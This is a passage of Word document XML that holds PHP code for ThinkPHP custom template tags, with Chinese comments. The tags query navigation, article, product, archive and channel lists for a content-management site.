    <w:p w14:paraId="220C8A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'close' =&gt; ['attr' =&gt; 'time,format', 'close' =&gt; 0], </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5630E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'open' =&gt; ['attr' =&gt; 'name,type', 'close' =&gt; 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D167C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'web' =&gt; ['attr' =&gt; 'name', 'close' =&gt; 0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BB41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'nav' =&gt; ['attr' =&gt; 'pid,limit,orderby'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D3C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'product' =&gt; ['attr' =&gt; 'cid,field,orderby,limit,pagesize'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACCE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=&gt; ['attr' =&gt; 'cid,field,orderby,limit,pagesize,empty'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218E5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'archived' =&gt; ['close' =&gt; 1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D299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92A7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2ECA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这是一个闭合标签的简单演示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F102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D840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tagClose($tag)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753AF2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7721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$format = empty($tag['format']) ? 'Y-m-d H:i:s' : $tag['format'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023E9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empty($tag['time']) ? time() : $tag['time'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C08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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1424D2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'echo date("' . $format . '",' . $time . ');';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AE4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 ?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309C1C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701066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0F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4F00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这是一个非闭合标签的简单演示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD9C7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C1FE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tagOpen($tag, $content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024B36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666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empty($tag['type']) ? 0 : 1; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B7E6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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381A97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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F23A9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'$test_arr=[[1,3,5,7,9],[2,4,6,8,10]];'; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461BDA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'$list = think\Db::name(\'product\')-&gt;where(\'cid\',1)-&gt;select();';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359D7B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'$__LIST__ = $list;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75994F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'?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157F36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'{volist name="__LIST__" id="' . $name . '"}';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C552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79A4E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'{/volist}';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465E85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332370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A2DF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tagWeb($tag){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106C61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28F070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2B0B6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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5411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think\Db::name('system')-&gt;where(['name'=&gt; 'site_$name'])-&gt;value('value');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0731E6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\$name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206A50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29A076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0BF3D6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247FA3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9E51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9F30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获取导航列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011F35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472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tagNav($tag, $content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3642E5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5A07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$pid = $tag['pid'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDE2D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isset($tag['limit']) ? $tag['limit'] : 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159051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5C93FD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&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346D71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getAllCategory(0,"$pid","$limit");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A512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\$key =&gt; \$nav):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C86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0C44E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499818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6AF646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 ?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F15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390618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F9C7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6763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获取文章归档列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F67A6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5B63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tagArchived($tag, $content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFF20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8EC0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676EF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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277F7D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think\Db::name('article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FB1D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-&gt;field("FROM_UNIXTIME(publishtime,'%Y-%m') as date,count(id) as count")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB246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-&gt;where('status',0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E36CD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-&gt;group('date')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1781D9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-&gt;order('date DESC')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8FA3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0735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\$key =&gt; \$archived):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65059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\$archived['url'] = url('search/search4Date',['date' =&gt; \$archived['date']]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B38B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5CF86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407E6C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4D1AB1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 ?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142710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39C14E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EE89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21BC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获取商品列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A52E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D455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tagProduct($tag, $content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D36C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F607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$cid = isset($tag['cid']) ? $tag['cid'] : 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279BB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isset($tag['orderby']) ? $tag['orderby'] : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDC0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isset($tag['limit']) ? $tag['limit'] : 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D105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$pagesize = isset($tag['pagesize']) ? $tag['pagesize'] : 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DB0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 = isset($tag['field']) ? $tag['field'] : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B476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434468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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32603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think\Db::name('product')-&gt;where(['cid'=&gt; $cid,'status' =&gt; 0]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F58A6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if("$field" != ''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E89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\$list=\$list-&gt;field("$field");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5381AC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C633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if("$order" != ''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAA2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\$list=\$list-&gt;order("$order");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A4E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100C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 &gt; 0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B34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\$list=\$list-&gt;paginate($pagesize);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEB73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\$page = \$list-&gt;render();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C62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BB1B0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if($limit != 0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD1E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\$list=\$list-&gt;limit($limit);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F7CB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4B00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\$list=\$list-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4CF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933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\$list;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59ED2D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\$key =&gt; \$product):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE7E5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\$product['url'] = url('show/index',['cid' =&gt; \$product['cid'],'id' =&gt; \$product['id']]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5012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73DE69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368C12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36B7B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 ?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42458E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016AA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CEA5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A61E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获取文章列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFE5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5679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tagArticle($tag, $content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68906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8AD3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$cid = isset($tag['cid']) ? $tag['cid'] : 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D432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isset($tag['orderby']) ? $tag['orderby'] : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A31B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isset($tag['limit']) ? $tag['limit'] : 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D74B2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$pagesize = isset($tag['pagesize']) ? $tag['pagesize'] : 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DF05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 = isset($tag['field']) ? $tag['field'] : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DA07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$empty = isset($tag['empty']) ? $tag['empty'] : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355F8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 = Db::name('category')-&gt;where('pid',$cid)-&gt;field('id')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D215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print_r(array_column($children_ids,'id'));die;*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738004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11334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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783BB2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\$condition['status'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254BC3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存在子类，则获取子类下的文章</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668D6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if($cid){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3F6A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\$condition['cid'] = $cid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDE6D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 = think\Db::name('category')-&gt;field('id')-&gt;where('pid',\$condition['cid'])-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690D84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 = array_column(\$children_ids,'id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A79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DB06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think\Db::name('article')-&gt;where(\$condition);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA2F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if(isset(\$children_ids) &amp;&amp; \$children_ids){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5A77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\$list-&gt;whereor('cid','in',\$children_ids);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AB10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A522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if("$field" != ''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152CF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\$list=\$list-&gt;field("$field");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7877A4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FB5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if("$order" != ''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6666A1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\$list=\$list-&gt;order("$order");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A610F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A8C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 &gt; 0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA209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\$list=\$list-&gt;paginate($pagesize);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7940EA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\$list-&gt;render();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A820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A993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if($limit != 0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C5F5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\$list=\$list-&gt;limit($limit);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C767A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3EB3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\$list=\$list-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0872E2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6836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\$list;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0AF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\$key =&gt; \$article):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF1A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\$article['url'] = url('show/index',['cid' =&gt; \$article['cid'],'id' =&gt; \$article['id']]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B206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650F0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0C2DD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567F66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endforeach;?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70978F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0172AB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231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77380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app\common\taglib;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750AE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think\template\TagLib;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E93E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B6223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Fx extends TagLib{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFA85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F0CD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定义标签列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200E8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CAAE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$tags   =  [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42949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'close'     =&gt; ['attr' =&gt; 'time,format', 'close' =&gt; 0], </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CE9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=&gt; ['attr' =&gt; 'id,limit,order', 'close' =&gt; 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668D50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=&gt; ['attr' =&gt; 'id,tid,limit,order,pagesize,field,image', 'close' =&gt; 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5662D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=&gt; ['attr' =&gt; 'field,order,limit,pagesize,flags,typeid,image,id', 'close' =&gt; 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C589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'slide'     =&gt; ['attr' =&gt; 'field,order,limit,pagesize,id,tid', 'close' =&gt; 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3B52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'link'     =&gt; ['attr' =&gt; 'order,limit,pagesize,id,img', 'close' =&gt; 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D7B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256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0BA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获取栏目分类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F404A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7C9D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tagMychannel($tag, $content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A18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DA6D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isset($tag['id']) ? $tag['id'] : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B1B2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isset($tag['order']) ? $tag['order'] : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541C77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isset($tag['limit']) ? $tag['limit'] : 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6333D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57A218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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008EB3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unset(\$where); /*unset</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>销毁代码，处理怪异问题，待研究</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D885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72C6E9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指定</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>栏目</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>3*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53ECA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 ''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396A2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['in','$id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398A4B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71A0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think\Db::name('mychannel')-&gt;where(\$where);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672E36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排序</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DBD6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if("$order" != ''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C6A7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\$list=\$list-&gt;order("$order");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0C03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DF960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\$list=\$list-&gt;order("id asc");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12ED6B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4ADD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数量</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080EC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if($limit != 0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B35A0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\$list=\$list-&gt;limit($limit);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134E37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AF9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\$list=\$list-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9D90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开始赋值</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BDC7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\$list;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BADD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 =&gt; \$fx):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46775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6B0A2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7F464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457AE3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endforeach;?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167CC1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4B1C3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87F1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3A20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获取栏目分类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF450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BA8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tagTypeid($tag, $content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E620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D8F4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isset($tag['id']) ? $tag['id'] : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681F6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$tid = isset($tag['tid']) ? $tag['tid'] : 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E9A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 = isset($tag['field']) ? $tag['field'] : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573436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isset($tag['order']) ? $tag['order'] : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090A9F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isset($tag['limit']) ? $tag['limit'] : 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779FC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$pagesize = isset($tag['pagesize']) ? $tag['pagesize'] : 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486836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isset($tag['image']) ? $tag['image'] : "";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F84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2ECD6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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A065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unset(\$where); /*unset</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>销毁代码，处理怪异问题，待研究</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0015AE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5AC7C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if($tid !=''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9CE0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\$where['tid']  =   $tid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4657C4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135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模型频道</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72491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判断是否有缩略图</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4379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if("$image" != ''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099C3F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if('$image'=='image'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3AA4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 =   ['neq',''];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CD27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if('$image'=='imageNo'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478121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 =   ['eq',''];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEAA3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7929C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8770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E302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指定</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>栏目</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>3*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BEACA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 ''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596712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['in','$id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6232F5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7FBD6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think\Db::name('typeid')-&gt;where(\$where);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736AD8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栏目排序</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650DC6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if("$order" != ''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8FF1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\$list=\$list-&gt;order("$order");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193644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200CB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\$list=\$list-&gt;order("des desc,id asc");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0399B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AB71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分页与数量</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2BE1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 !=''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6B69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if($pagesize==0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCD46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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A11D7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98BB2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\$list=\$list-&gt;paginate($pagesize);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4DDF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9582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\$list-&gt;render();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C91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243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数量</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF9A0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if($limit != 0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46983B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\$list=\$list-&gt;limit($limit);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5920B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9326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\$list=\$list-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43420B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AF1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开始赋值</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DC25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\$list;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028C5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 =&gt; \$fx):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD53D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if(!\$fx['url']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B17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\$fx['url'] = url("article/typeid",["id"=&gt;\$fx["id"]]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7CE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EE4A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49A984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073B9B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14C56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endforeach;?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73EBE4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3B9D1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F52D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D558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获取文章列表</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">  \$url = url("article/article",["id"=&gt;\$v["id"]]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB989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\$v["title"];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE45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\$v["id"];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132B23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\$v["typeid"];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F4A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\$v["typeid"];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF182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\$fields=think\Db::getTableInfo('fx_article','fields');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1535C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extract(\$fields);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB4B9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\$fields[1];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3D8A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FD7E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tagArticle($tag, $content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F6D0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48A977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 = isset($tag['v']) ? $tag['v'] : 'fx';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28526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isset($tag['id']) ? $tag['id'] : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D11FA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isset($tag['typeid']) ? $tag['typeid'] : 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C003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isset($tag['order']) ? $tag['order'] : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2261AD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$limit = isset($tag['limit']) ? $tag['limit'] : 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18397F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$pagesize = isset($tag['pagesize']) ? $tag['pagesize'] : 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E3F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 = isset($tag['field']) ? $tag['field'] : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A7F2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$flags = isset($tag['flags']) ? $tag['flags'] : 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4714F5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isset($tag['time']) ? $tag['time'] : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A216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isset($tag['keywords']) ? $tag['keywords'] : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E18A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isset($tag['image']) ? $tag['image'] : "";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EB9E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3438D5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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03664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unset(\$where); /*unset</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>销毁代码，处理怪异问题，待研究</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06050A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\$where['flags']=$flags;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7CBB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6E4288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调用分类栏目</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09815D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if($typeid){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F7D0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\$condition['cid'] = $typeid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FCCD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 = think\Db::name('typeid')-&gt;field('id')-&gt;where('tid',\$condition['cid'])-&gt;cache(_cache('db'))-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786E99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如果分类有子栏目</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
